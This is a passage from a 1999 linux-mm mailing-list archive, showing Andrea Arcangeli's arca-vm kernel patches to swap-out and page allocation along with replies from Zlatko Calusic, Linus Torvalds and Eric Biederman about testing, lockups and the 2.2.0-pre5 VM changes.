-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -410,10 +446,11 @@
 		}
 
 		/*
-		 * Nonzero means we cleared out something, but only "1" means
-		 * that we actually free'd up a page as a result.
+		 * Nonzero means we cleared out something, and "1" means
+		 * that we actually moved a page from the process memory
+		 * to the swap cache (it's not been freed yet).
 		 */
-		if (swap_out_process(pbest, gfp_mask) == 1)
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:
@@ -440,40 +477,63 @@
                s = revision, i = -1;
        printk ("Starting kswapd v%.*s\n", i, s);
 }
+
+static int do_free_user_and_cache(int priority, int gfp_mask)
+{
+	if (shrink_mmap(priority, gfp_mask))
+		return 1;
 
-#define free_memory(fn) \
-	count++; do { if (!--count) goto done; } while (fn)
+	/*
+	 * NOTE: Here we allow also the process to do async swapout
+	 * because the swapout is really only a credit at the bank of
+	 * free memory right now. So we don't care to have it _now_.
+	 * Allowing async I/O we are going to improve drammatically
+	 * swapout performance -arca (discovered this afternoon ;) 980105
+	 */
+	if (swap_out(priority, gfp_mask & ~__GFP_WAIT))
+		/*
+		 * We done at least some swapping progress so return 1 in
+		 * this case. -arca
+		 */
+		return 1;
 
-static int kswapd_free_pages(int kswapd_state)
+	return 0;
+}
+
+static int do_free_page(int * state, int gfp_mask)
 {
-	unsigned long end_time;
+	int priority = 8;
 
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(0);
+	switch (*state) {
+		do {
+		case 0:
+			if (do_free_user_and_cache(priority, gfp_mask))
+				return 1;
+			*state = 1;
+		case 1:
+			if (shm_swap(priority, gfp_mask))
+				return 1;
+			*state = 0;
 
-	/* max one hundreth of a second */
-	end_time = jiffies + (HZ-1)/100;
-	do {
-		int priority = 8;
-		int count = pager_daemon.swap_cluster;
+			shrink_dcache_memory(priority, gfp_mask);
+			kmem_cache_reap(gfp_mask);
+		} while (--priority >= 0);
+	}
+	return 0;
+}
 
-		switch (kswapd_state) {
-			do {
-			default:
-				free_memory(shrink_mmap(priority, 0));
-				free_memory(swap_out(priority, 0));
-				kswapd_state++;
-			case 1:
-				free_memory(shm_swap(priority, 0));
-				shrink_dcache_memory(priority, 0);
-				kswapd_state = 0;
-			} while (--priority >= 0);
-			return kswapd_state;
-		}
-done:
-		if (nr_free_pages > freepages.high + pager_daemon.swap_cluster)
+static int kswapd_free_pages(int kswapd_state)
+{
+	for(;;)
+	{
+		do_free_page(&kswapd_state, 0);
+		if (nr_free_pages > freepages.high)
 			break;
-	} while (time_before_eq(jiffies,end_time));
+		if (atomic_read(&nr_tasks_freeing_memory))
+			break;
+		if (kswapd_task->need_resched)
+			schedule();
+	};
 	return kswapd_state;
 }
 
@@ -496,13 +556,6 @@
 	lock_kernel();
 
 	/*
-	 * Set the base priority to something smaller than a
-	 * regular process. We will scale up the priority
-	 * dynamically depending on how much memory we need.
-	 */
-	current->priority = (DEF_PRIORITY * 2) / 3;
-
-	/*
 	 * Tell the memory management that we're a "memory allocator",
 	 * and that if we need more memory we should get access to it
 	 * regardless (see "try_to_free_pages()"). "kswapd" should
@@ -516,7 +569,6 @@
 	 */
 	current->flags |= PF_MEMALLOC;
 
-	init_swap_timer();
 	kswapd_task = current;
 	while (1) {
 		int state = 0;
@@ -543,107 +595,35 @@
  * if we need more memory as part of a swap-out effort we
  * will just silently return "success" to tell the page
  * allocator to accept the allocation.
- *
- * We want to try to free "count" pages, and we need to 
- * cluster them so that we get good swap-out behaviour. See
- * the "free_memory()" macro for details.
  */
 int try_to_free_pages(unsigned int gfp_mask, int count)
 {
-	int retval;
-
+	int retval = 1;
 	lock_kernel();
-
-	/* Always trim SLAB caches when memory gets low. */
-	kmem_cache_reap(gfp_mask);
-
-	retval = 1;
-	if (!(current->flags & PF_MEMALLOC)) {
-		int priority;
 
-		current->flags |= PF_MEMALLOC;
-	
-		priority = 8;
-		do {
-			free_memory(shrink_mmap(priority, gfp_mask));
-			free_memory(shm_swap(priority, gfp_mask));
-			free_memory(swap_out(priority, gfp_mask));
-			shrink_dcache_memory(priority, gfp_mask);
-		} while (--priority >= 0);
-		retval = 0;
-done:
-		current->flags &= ~PF_MEMALLOC;
+	current->flags |= PF_MEMALLOC;
+	atomic_inc(&nr_tasks_freeing_memory);
+	while (count--)
+	{
+		static int state = 0;
+		if (!do_free_page(&state, gfp_mask))
+		{
+			retval = 0;
+			break;
+		}
 	}
-	unlock_kernel();
+	atomic_dec(&nr_tasks_freeing_memory);
+	current->flags &= ~PF_MEMALLOC;
 
+	unlock_kernel();
 	return retval;
 }
 
-/*
- * Wake up kswapd according to the priority
- *	0 - no wakeup
- *	1 - wake up as a low-priority process
- *	2 - wake up as a normal process
- *	3 - wake up as an almost real-time process
- *
- * This plays mind-games with the "goodness()"
- * function in kernel/sched.c.
- */
-static inline void kswapd_wakeup(struct task_struct *p, int priority)
+void kswapd_wakeup(void)
 {
-	if (priority) {
-		p->counter = p->priority << priority;
-		wake_up_process(p);
-	}
-}
+	struct task_struct * p = kswapd_task;
 
-/* 
- * The swap_tick function gets called on every clock tick.
- */
-void swap_tick(void)
-{
-	struct task_struct *p = kswapd_task;
-
-	/*
-	 * Only bother to try to wake kswapd up
-	 * if the task exists and can be woken.
-	 */
-	if (p && (p->state & TASK_INTERRUPTIBLE)) {
-		unsigned int pages;
-		int want_wakeup;
-
-		/*
-		 * Schedule for wakeup if there isn't lots
-		 * of free memory or if there is too much
-		 * of it used for buffers or pgcache.
-		 *
-		 * "want_wakeup" is our priority: 0 means
-		 * not to wake anything up, while 3 means
-		 * that we'd better give kswapd a realtime
-		 * priority.
-		 */
-		want_wakeup = 0;
-		pages = nr_free_pages;
-		if (pages < freepages.high)
-			want_wakeup = 1;
-		if (pages < freepages.low)
-			want_wakeup = 2;
-		if (pages < freepages.min)
-			want_wakeup = 3;
-	
-		kswapd_wakeup(p,want_wakeup);
-	}
-
-	timer_active |= (1<<SWAP_TIMER);
-}
-
-/* 
- * Initialise the swap timer
- */
-
-void init_swap_timer(void)
-{
-	timer_table[SWAP_TIMER].expires = jiffies;
-	timer_table[SWAP_TIMER].fn = swap_tick;
-	timer_active |= (1<<SWAP_TIMER);
+	if (p && (p->state & TASK_INTERRUPTIBLE) &&
+	    !atomic_read(&nr_tasks_freeing_memory))
+		wake_up_process(p);
 }
Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.5 linux/mm/page_alloc.c:1.1.1.1.2.18
--- linux/mm/page_alloc.c:1.1.1.5	Sun Jan  3 20:42:44 1999
+++ linux/mm/page_alloc.c	Tue Jan  5 16:17:00 1999
@@ -3,6 +3,7 @@
  *
  *  Copyright (C) 1991, 1992, 1993, 1994  Linus Torvalds
  *  Swap reorganised 29.12.95, Stephen Tweedie
+ *  memory_trashing heuristic. Copyright (C) 1998  Andrea Arcangeli
  */
 
 #include <linux/config.h>
@@ -250,17 +251,18 @@
 		 * a bad memory situation, we're better off trying
 		 * to free things up until things are better.
 		 *
-		 * Normally we shouldn't ever have to do this, with
-		 * kswapd doing this in the background.
-		 *
 		 * Most notably, this puts most of the onus of
 		 * freeing up memory on the processes that _use_
 		 * the most memory, rather than on everybody.
 		 */
-		if (nr_free_pages > freepages.min) {
+		if (nr_free_pages > freepages.min+(1<<order)) {
 			if (!current->trashing_memory)
+				goto ok_to_allocate;
+			if (current->flags & PF_MEMALLOC)
+				goto ok_to_allocate;
+			if (nr_free_pages > freepages.low+(1<<order))
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (nr_free_pages > freepages.high+(1<<order)) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
 			}
@@ -271,8 +273,11 @@
 		 * memory.
 		 */
 		current->trashing_memory = 1;
-		if (!try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
+		if (!try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + (1<<order)) && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 			goto nopage;
+	} else {
+		if (nr_free_pages < freepages.min)
+			kswapd_wakeup();
 	}
 ok_to_allocate:
 	spin_lock_irqsave(&page_alloc_lock, flags);
Index: linux/include/linux/mm.h
diff -u linux/include/linux/mm.h:1.1.1.3 linux/include/linux/mm.h:1.1.1.1.2.13
--- linux/include/linux/mm.h:1.1.1.3	Sat Jan  2 15:24:18 1999
+++ linux/include/linux/mm.h	Mon Jan  4 18:42:52 1999
@@ -118,7 +118,6 @@
 	unsigned long offset;
 	struct page *next_hash;
 	atomic_t count;
-	unsigned int unused;
 	unsigned long flags;	/* atomic flags, some possibly updated asynchronously */
 	struct wait_queue *wait;
 	struct page **pprev_hash;
@@ -295,8 +294,7 @@
 
 /* filemap.c */
 extern void remove_inode_page(struct page *);
-extern unsigned long page_unuse(struct page *);
-extern int shrink_mmap(int, int);
+extern int FASTCALL(shrink_mmap(int, int));
 extern void truncate_inode_pages(struct inode *, unsigned long);
 extern unsigned long get_cached_page(struct inode *, unsigned long, int);
 extern void put_cached_page(unsigned long);
Index: linux/mm/swap.c
diff -u linux/mm/swap.c:1.1.1.5 linux/mm/swap.c:1.1.1.1.2.8
--- linux/mm/swap.c:1.1.1.5	Sat Jan  2 15:24:40 1999
+++ linux/mm/swap.c	Sat Jan  2 21:40:13 1999
@@ -64,13 +64,13 @@
 swapstat_t swapstats = {0};
 
 buffer_mem_t buffer_mem = {
-	2,	/* minimum percent buffer */
+	5,	/* minimum percent buffer */
 	10,	/* borrow percent buffer */
 	60	/* maximum percent buffer */
 };
 
 buffer_mem_t page_cache = {
-	2,	/* minimum percent page cache */
+	5,	/* minimum percent page cache */
 	15,	/* borrow percent page cache */
 	75	/* maximum */
 };
Index: linux/include/linux/swap.h
diff -u linux/include/linux/swap.h:1.1.1.4 linux/include/linux/swap.h:1.1.1.1.2.10
--- linux/include/linux/swap.h:1.1.1.4	Tue Dec 29 01:39:03 1998
+++ linux/include/linux/swap.h	Tue Jan  5 01:12:59 1999
@@ -83,6 +83,7 @@
 
 /* linux/mm/vmscan.c */
 extern int try_to_free_pages(unsigned int gfp_mask, int count);
+extern void kswapd_wakeup(void);
 
 /* linux/mm/page_io.c */
 extern void rw_swap_page(int, unsigned long, char *, int);
@@ -167,9 +168,11 @@
 	count = atomic_read(&page->count);
 	if (PageSwapCache(page))
 	{
+#if 0
 		/* PARANOID */
 		if (page->inode != &swapper_inode)
 			panic("swap cache page has wrong inode\n");
+#endif
 		count += swap_count(page->offset) - 2;
 	}
 	if (PageFreeAfter(page))


--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 28%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05 13:23 62%                                   ` Zlatko Calusic
@ 1999-01-05 15:42 64%                                     ` Andrea Arcangeli
  1999-01-05 16:16 59%                                       ` Zlatko Calusic
  0 siblings, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-05 15:42 UTC (permalink / raw)
  To: Zlatko Calusic; +Cc: linux-kernel, linux-mm

On 5 Jan 1999, Zlatko Calusic wrote:

> I tried few times, but to no avail. Looks like subtle race, bad news
> for you, unfortunately.

Hmm, I gues it's been due the wrong order shifiting you pointed out a bit
before...

The lockup could be due to one oom loop. Ingo pointed out at once that
raid1 (if I remeber well) has one of them. Do you use raidx?

> Sure, just be careful. :)

Don't worry ;). Could you try if you can reproduce problems with
arca-vm-8? 

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm improvement , [Re: 2.2.0 Bug summary]]
  1999-01-05 15:42 64%                                     ` Andrea Arcangeli
@ 1999-01-05 16:16 59%                                       ` Zlatko Calusic
  0 siblings, 0 replies; 200+ results
From: Zlatko Calusic @ 1999-01-05 16:16 UTC (permalink / raw)
  To: Andrea Arcangeli

Andrea Arcangeli <andrea@e-mind.com> writes:

> On 5 Jan 1999, Zlatko Calusic wrote:
> 
> > I tried few times, but to no avail. Looks like subtle race, bad news
> > for you, unfortunately.
> 
> Hmm, I gues it's been due the wrong order shifiting you pointed out a bit
> before...

Nope. I fixed that before compiling. :)
It's even in my PRCS tree, your patches and my parentheses. :)

linux-2.1 2204.3 Tue, 05 Jan 1999 00:15:24 +0100 by zcalusic
Parent-Version:      2204.2
Version-Log:         MM & no kswapd (andrea)

linux-2.1 2204.4 Tue, 05 Jan 1999 03:34:57 +0100 by zcalusic
Parent-Version:      2204.2
Version-Log:         arca-vm-7

> 
> The lockup could be due to one oom loop. Ingo pointed out at once that
> raid1 (if I remeber well) has one of them. Do you use raidx?
> 

Wow, that's a new variable in a story, I'm indeed using raid0 (IDE +
SCSI). That is it, then. Should I contact Ingo about that? I'm not on
linux-raid, so I never heard of a problem like that, in fact it
happened only yesterday I lost control of machine in such a strange
way.

> > Sure, just be careful. :)
> 
> Don't worry ;). Could you try if you can reproduce problems with
> arca-vm-8? 
> 

Huh, I must refuse your proposal, at least til' I get some
sleep. :(

Tomorrow is non-working day, so I'll spend some time reading stuff
(recently I bought Rubini's Device Drivers), and on the Thursday I'm
back to regular schedule, sleepless nights and arca-vm-10, at that
time, probably. :)

While at VM changes, I have one (reborn) objection. It looks like
recent kernels are once again very aggressive when it comes to copying
lots of data. That is, if you cp few hundred of MB's, you effectively
finish with cleansed memory (populated with page cache pages) and
programs are on swap. Behaviour is practicaly identical in vanilla
Linus' tree and with your changes applied. Maybe you could, when
you're at it, see if that problem can be solved. With such a
behaviour, Linux feels very slugish, feels like a NT crap.

I know it's tough job, because I spent lots of time trying, but my
conclusion is that whenever you have good swapping speed, kernel will
outswap too much. On the other side if you fix that, swapping speed
drops. Tough luck. :(

I wish you good luck with your work, anyway.
-- 
Zlatko
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 59%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-05 15:35 28%                               ` arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]] Andrea Arcangeli
@ 1999-01-06 14:48 63%                                 ` Andrea Arcangeli
  1999-01-06 23:31 58%                                   ` Andrea Arcangeli
  1999-01-06 23:35 64%                                   ` Linus Torvalds
  0 siblings, 2 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-06 14:48 UTC (permalink / raw)
  To: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann
  Cc: Linus Torvalds, Alan Cox, bredelin, Stephen C. Tweedie,
	linux-kernel, Rik van Riel, linux-mm

On Tue, 5 Jan 1999, Andrea Arcangeli wrote:

> I fixed some thing in arca-vm-7. This new is arca-vm-8.

I've put out arca-vm-9.

It seems that it's a lose marking as not referenced all freed pages in
__free_pages(). Probably because shrink_mmap() doesn't like to decrease
the `count' on just freed pages. So now I mark all freed pages as
referenced.

In the last patches (arca-vm[78] I forgot to include the filemap.c diff)
that seems to improve performances here (allowing the swap cache to be
shrunk without care about pgcache_under_min()).

arca-vm-9 return to a linear behavior in cacluating the swapout weight.

You can donwload arca-vm-9 from here:

ftp://e-mind.com/pub/linux/kernel-patches/2.2.0-pre4-arca-VM-9

Let me know if you'll try it. Thanks!

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 63%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 14:48 63%                                 ` Andrea Arcangeli
@ 1999-01-06 23:31 58%                                   ` Andrea Arcangeli
  1999-01-06 23:35 64%                                   ` Linus Torvalds
  1 sibling, 0 replies; 200+ results
From: Andrea Arcangeli @ 1999-01-06 23:31 UTC (permalink / raw)
  To: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann
  Cc: bredelin, linux-kernel, linux-mm, Linus Torvalds, Alan Cox,
	Stephen C. Tweedie

On Wed, 6 Jan 1999, Andrea Arcangeli wrote:

> I've put out arca-vm-9.

Woops in both arca-vm-8 and arca-vm-9 there was a very stupid bug in my
changes of the memory_trashing heuristic (done at too late time..). 
Basically when a process was masked to be a memory_trasher, it had no ways
to return a not marked process................ 

I didn' t noticed the bug because I use swap only when I do my benchmarks
(when there is not swapping in progress the slowdown due some
shrink_mmap() can't be seen with eyes...) and when I run my benchmarks I
always start before the memory trasher proggy...

Thanks to Benjamin who showed me the bugs some seconds ago ;)

I've put out a new arca-vm-10 with at least this bug fixed.

ftp://e-mind.com/pub/linux/kernel-patches/2.2.0-pre4-arca-VM-10

Excuse me...

BTW, I have reports that arca-vm-6/7 are faster than arca-vm-8/9
(arca-vm-7 is reported the fastest even more than arca-vm-3). Maybe it's
been due this bug that the latest are slower, or maybe the whole new
changes at the first memory_trashing code (the one in 2.2.0-pre4) are
hurting... (even if here them seems to helps, with them the trashing
process remains marked all the time and not only during low mem peak; and
not trashing process never get marked as trashing) 

And again thanks to Steve, Zlatko, Benjamin, Ben, Garst, MikeG, Kalle,
Brent and all other testers for their good reports! 

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 58%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 14:48 63%                                 ` Andrea Arcangeli
  1999-01-06 23:31 58%                                   ` Andrea Arcangeli
@ 1999-01-06 23:35 64%                                   ` Linus Torvalds
  1999-01-07  4:30 62%                                     ` Eric W. Biederman
  1999-01-07 14:11 45%                                     ` Andrea Arcangeli
  1 sibling, 2 replies; 200+ results
From: Linus Torvalds @ 1999-01-06 23:35 UTC (permalink / raw)
  To: Andrea Arcangeli
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm


Oh, well.. Based on what the arca-[678] patches did, there's now a pre-5
out there. Not very similar, but it should incorporate the basic idea: 
namely much more aggressively asynchronous swap-outs from a process
context. 

Comment away,

		Linus

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 23:35 64%                                   ` Linus Torvalds
@ 1999-01-07  4:30 62%                                     ` Eric W. Biederman
  1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 14:11 45%                                     ` Andrea Arcangeli
  1 sibling, 1 reply; 200+ results
From: Eric W. Biederman @ 1999-01-07  4:30 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm

>>>>> "LT" == Linus Torvalds <torvalds@transmeta.com> writes:

LT> Oh, well.. Based on what the arca-[678] patches did, there's now a pre-5
LT> out there. Not very similar, but it should incorporate the basic idea: 
LT> namely much more aggressively asynchronous swap-outs from a process
LT> context. 

LT> Comment away,

1) With your comments on PG_dirty/(what shrink_mmap should do) you
   have worked out what needs to happen for the mapped in memory case,
   and I haven't quite gotten there.  Thank You.

2) I have tested using PG_dirty from shrink_mmap and it is a
   performance problem because it loses all locality of reference,
   and because it forces shrink_mmap into a dual role, of freeing and
   writing pages, which need seperate tuning.

Linus is this a case you feel is important to tune for 2.2?
If so I would be happy to play with it.

Eric
--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 62%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-06 23:35 64%                                   ` Linus Torvalds
  1999-01-07  4:30 62%                                     ` Eric W. Biederman
@ 1999-01-07 14:11 45%                                     ` Andrea Arcangeli
  1999-01-07 18:19 55%                                       ` Linus Torvalds
  1 sibling, 1 reply; 200+ results
From: Andrea Arcangeli @ 1999-01-07 14:11 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: steve, brent verner, Garst R. Reese, Kalle Andersson,
	Zlatko Calusic, Ben McCann, bredelin, linux-kernel, linux-mm

On Wed, 6 Jan 1999, Linus Torvalds wrote:

> Oh, well.. Based on what the arca-[678] patches did, there's now a pre-5
> out there. Not very similar, but it should incorporate the basic idea: 
> namely much more aggressively asynchronous swap-outs from a process
> context. 

I like it infact ;). I just have some diff that I would like to put under
testing. The patches are against 2.2.0-pre5.

This first patch allow swap_out to have a more fine grined weight. Should
help at least in low memory envinronments.

diff -u linux/mm/vmscan.c:1.1.1.10 linux/mm/vmscan.c:1.1.1.1.2.72
--- linux/mm/vmscan.c:1.1.1.10	Thu Jan  7 12:21:36 1999
+++ linux/mm/vmscan.c	Thu Jan  7 14:46:17 1999
@@ -171,7 +179,7 @@
  */
 
 static inline int swap_out_pmd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pmd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pte_t * pte;
 	unsigned long pmd_end;
@@ -192,18 +200,20 @@
 
 	do {
 		int result;
-		tsk->swap_address = address + PAGE_SIZE;
 		result = try_to_swap_out(tsk, vma, address, pte, gfp_mask);
+		address += PAGE_SIZE;
+		tsk->swap_address = address;
 		if (result)
 			return result;
-		address += PAGE_SIZE;
+		if (!--*counter)
+			return 0;
 		pte++;
 	} while (address < end);
 	return 0;
 }
 
 static inline int swap_out_pgd(struct task_struct * tsk, struct vm_area_struct * vma,
-	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask)
+	pgd_t *dir, unsigned long address, unsigned long end, int gfp_mask, unsigned long * counter)
 {
 	pmd_t * pmd;
 	unsigned long pgd_end;
@@ -223,9 +233,11 @@
 		end = pgd_end;
 	
 	do {
-		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask);
+		int result = swap_out_pmd(tsk, vma, pmd, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PMD_SIZE) & PMD_MASK;
 		pmd++;
 	} while (address < end);
@@ -233,7 +245,7 @@
 }
 
 static int swap_out_vma(struct task_struct * tsk, struct vm_area_struct * vma,
-	unsigned long address, int gfp_mask)
+	unsigned long address, int gfp_mask, unsigned long * counter)
 {
 	pgd_t *pgdir;
 	unsigned long end;
@@ -247,16 +259,19 @@
 
 	end = vma->vm_end;
 	while (address < end) {
-		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask);
+		int result = swap_out_pgd(tsk, vma, pgdir, address, end, gfp_mask, counter);
 		if (result)
 			return result;
+		if (!*counter)
+			return 0;
 		address = (address + PGDIR_SIZE) & PGDIR_MASK;
 		pgdir++;
 	}
 	return 0;
 }
 
-static int swap_out_process(struct task_struct * p, int gfp_mask)
+static int swap_out_process(struct task_struct * p, int gfp_mask,
+			    unsigned long * counter)
 {
 	unsigned long address;
 	struct vm_area_struct* vma;
@@ -275,9 +290,12 @@
 			address = vma->vm_start;
 
 		for (;;) {
-			int result = swap_out_vma(p, vma, address, gfp_mask);
+			int result = swap_out_vma(p, vma, address, gfp_mask,
+						  counter);
 			if (result)
 				return result;
+			if (!*counter)
+				return 0;
 			vma = vma->vm_next;
 			if (!vma)
 				break;
@@ -291,6 +309,25 @@
 	return 0;
 }
 
+static inline unsigned long calc_swapout_weight(int priority)
+{
+	struct task_struct * p;
+	unsigned long total_vm = 0;
+
+	read_lock(&tasklist_lock);
+	for_each_task(p)
+	{
+		if (!p->swappable)
+			continue;
+		if (p->mm->rss == 0)
+			continue;
+		total_vm += p->mm->total_vm;
+	}
+	read_unlock(&tasklist_lock);
+
+	return total_vm / (1+priority);
+}
+
 /*
  * Select the task with maximal swap_cnt and try to swap out a page.
  * N.B. This function returns only 0 or 1.  Return values != 1 from
@@ -299,7 +336,10 @@
 static int swap_out(unsigned int priority, int gfp_mask)
 {
 	struct task_struct * p, * pbest;
-	int counter, assign, max_cnt;
+	int assign;
+	unsigned long counter, max_cnt;
+
+	counter = calc_swapout_weight(priority);
 
 	/* 
 	 * We make one or two passes through the task list, indexed by 
@@ -315,23 +355,17 @@
 	 * Think of swap_cnt as a "shadow rss" - it tells us which process
 	 * we want to page out (always try largest first).
 	 */
-	counter = nr_tasks / (priority+1);
-	if (counter < 1)
-		counter = 1;
-	if (counter > nr_tasks)
-		counter = nr_tasks;
-
-	for (; counter >= 0; counter--) {
+	while (counter != 0) {
 		assign = 0;
 		max_cnt = 0;
 		pbest = NULL;
 	select:
 		read_lock(&tasklist_lock);
-		p = init_task.next_task;
-		for (; p != &init_task; p = p->next_task) {
+		for_each_task(p)
+		{
 			if (!p->swappable)
 				continue;
-	 		if (p->mm->rss <= 0)
+	 		if (p->mm->rss == 0)
 				continue;
 			/* Refresh swap_cnt? */
 			if (assign)
@@ -350,7 +384,7 @@
 			goto out;
 		}
 
-		if (swap_out_process(pbest, gfp_mask))
+		if (swap_out_process(pbest, gfp_mask, &counter))
 			return 1;
 	}
 out:







This other patch instead change a bit the trashing memory heuristic and
how many pages are freed every time. I am not sure it's the best thing to
do. So if you'll try it let me know the results... 

Index: linux/mm/page_alloc.c
diff -u linux/mm/page_alloc.c:1.1.1.6 linux/mm/page_alloc.c:1.1.1.1.2.22
--- linux/mm/page_alloc.c:1.1.1.6	Thu Jan  7 12:21:35 1999
+++ linux/mm/page_alloc.c	Thu Jan  7 12:57:23 1999
@@ -3,6 +3,7 @@
  *
  *  Copyright (C) 1991, 1992, 1993, 1994  Linus Torvalds
  *  Swap reorganised 29.12.95, Stephen Tweedie
+ *  memory_trashing heuristic. Copyright (C) 1998  Andrea Arcangeli
  */
 
 #include <linux/config.h>
@@ -258,20 +259,18 @@
 		 * a bad memory situation, we're better off trying
 		 * to free things up until things are better.
 		 *
-		 * Normally we shouldn't ever have to do this, with
-		 * kswapd doing this in the background.
-		 *
 		 * Most notably, this puts most of the onus of
 		 * freeing up memory on the processes that _use_
 		 * the most memory, rather than on everybody.
 		 */
-		if (nr_free_pages > freepages.min) {
+		if (nr_free_pages > freepages.min+(1<<order)) {
 			if (!current->trashing_memory)
 				goto ok_to_allocate;
-			if (nr_free_pages > freepages.low) {
+			if (nr_free_pages > freepages.high+(1<<order)) {
 				current->trashing_memory = 0;
 				goto ok_to_allocate;
-			}
+			} else if (nr_free_pages > freepages.low+(1<<order))
+				goto ok_to_allocate;
 		}
 		/*
 		 * Low priority (user) allocations must not
@@ -282,7 +281,7 @@
 		{
 			int freed;
 			current->flags |= PF_MEMALLOC;
-			freed = try_to_free_pages(gfp_mask, SWAP_CLUSTER_MAX);
+			freed = try_to_free_pages(gfp_mask, freepages.high - nr_free_pages + (1<<order));
 			current->flags &= ~PF_MEMALLOC;
 			if (!freed && !(gfp_mask & (__GFP_MED | __GFP_HIGH)))
 				goto nopage;



Thanks.

Andrea Arcangeli

--
This is a majordomo managed list.  To unsubscribe, send a message with
the body 'unsubscribe linux-mm me@address' to: majordomo@kvack.org

^ permalink raw reply	[relevance 45%]

* a bug report
@ 1999-01-07 15:53 64% radium
  1999-01-08 23:47 64% ` Anton Blanchard
  0 siblings, 1 reply; 200+ results
From: radium @ 1999-01-07 15:53 UTC (permalink / raw)
  To: ultralinux

[-- Attachment #1: Type: text/plain, Size: 250 bytes --]

i have a sun sparc station 2, with 64 mo ram, a seagate 4.5hd and when i want to quit the x-window interface, it crashes all the system. i try to recompilate the kernel, but it doesnt fix the bug.

thank you for all your work
best regards,  Marc

[-- Attachment #2: Type: text/html, Size: 663 bytes --]

^ permalink raw reply	[relevance 64%]

* Re: arca-vm-8 [Re: [patch] arca-vm-6, killed kswapd [Re: [patch] new-vm , improvement , [Re: 2.2.0 Bug summary]]]
  1999-01-07  4:30 62%                                     ` Eric W. Biederman
@ 1999-01-07 17:56 48%                                       ` Linus Torvalds
  1999-01-07 18:18 61%                                         ` Rik van Riel
                                                           ` (5 more replies)
  0 siblings, 6 replies; 200+ results
From: Linus Torvalds @ 1999-01-07 17:56 UTC (permalink / raw)
  To: Eric W. Biederman
  Cc: Andrea Arcangeli, steve, brent verner, Garst R. Reese,
	Kalle Andersson, Zlatko Calusic, Ben McCann, Alan Cox, bredelin,
	Stephen C. Tweedie, linux-kernel, Rik van Riel, linux-mm



On 6 Jan 1999, Eric W. Biederman wrote:
> 
> 1) With your comments on PG_dirty/(what shrink_mmap should do) you
